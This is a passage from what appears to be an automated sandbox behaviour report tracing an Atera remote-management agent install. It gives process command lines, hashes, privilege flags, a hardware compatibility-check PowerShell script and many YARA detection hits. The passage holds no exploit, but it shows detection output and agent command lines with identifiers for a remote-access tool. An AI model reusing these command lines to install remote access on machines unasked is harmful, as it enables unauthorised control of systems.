                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1999548038.0000024740947000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2000509919.0000024740A50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1999548038.0000024740890000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1999548038.000002474091A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2000576875.0000024741089000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1999548038.0000024740899000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2000576875.0000024741011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.1999548038.00000247408CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                                                              Start time:06:58:32
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                                                                              Start time:06:58:32
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                                                                              Imagebase:0x2162fb50000
                                                                                                                                                                                                                                                                                              File size:145'968 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2900108892.00000216491EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630C30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630946000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630D05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.00000216309BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630D43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630B22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630D1F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2905094619.000002164929A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2875938217.0000021648E51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630AFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630CD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2673282375.000002162FDA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2898620667.00000216491D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630D09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2673282375.000002162FE25000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2905094619.000002164924B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2875938217.0000021648EF5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2905094619.0000021649282000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.000002163092E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2673282375.000002162FDFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2673282375.000002162FDDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.00000216304E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2672475838.000002162FD40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2905094619.00000216492D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2653827102.000000834BF15000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.0000021630544000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.000002163091E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.00000216309CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2672027118.000002162FC00000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                                                                              Start time:06:58:32
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6f92a0000
                                                                                                                                                                                                                                                                                              File size:72'192 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                                                                              Start time:06:58:32
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                                                              Start time:06:58:33
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x281bd720000
                                                                                                                                                                                                                                                                                              File size:186'408 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9D8D50D2789C2A8D847D7953518A96F6
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2319840745.00000281BD900000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2320145221.00000281BD95C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2380233543.00000281D6940000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2320145221.00000281BD92E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE1D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2398010393.00000281D6A40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE267000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2320145221.00000281BD94C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE38A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE44F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2320145221.00000281BD993000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2320145221.00000281BD910000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2327349674.00000281BE4E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                                                                              Start time:06:58:33
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                                                                              Start time:06:58:34
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB $DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible "
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.2057309796.0000022F4BF90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                                                                              Start time:06:58:34
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                                                                              Start time:06:58:35
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x2ef73bc0000
                                                                                                                                                                                                                                                                                              File size:72'744 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:67FEF41237025021CD4F792E8C24E95A
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2678972153.000002EF73D7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2624626748.000002EF00111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2624626748.000002EF00103000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2678972153.000002EF73D30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2678972153.000002EF73DBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2678972153.000002EF73E28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2691314024.000002EF74E8C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2678972153.000002EF73D72000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2678972153.000002EF73DF5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000000.2019302027.000002EF73BC2000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2624626748.000002EF0007B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2691314024.000002EF74DD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2678380082.000002EF73CB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2624626748.000002EF00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2624626748.000002EF00252000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2691314024.000002EF74DB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                                                                              Start time:06:58:35
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:35
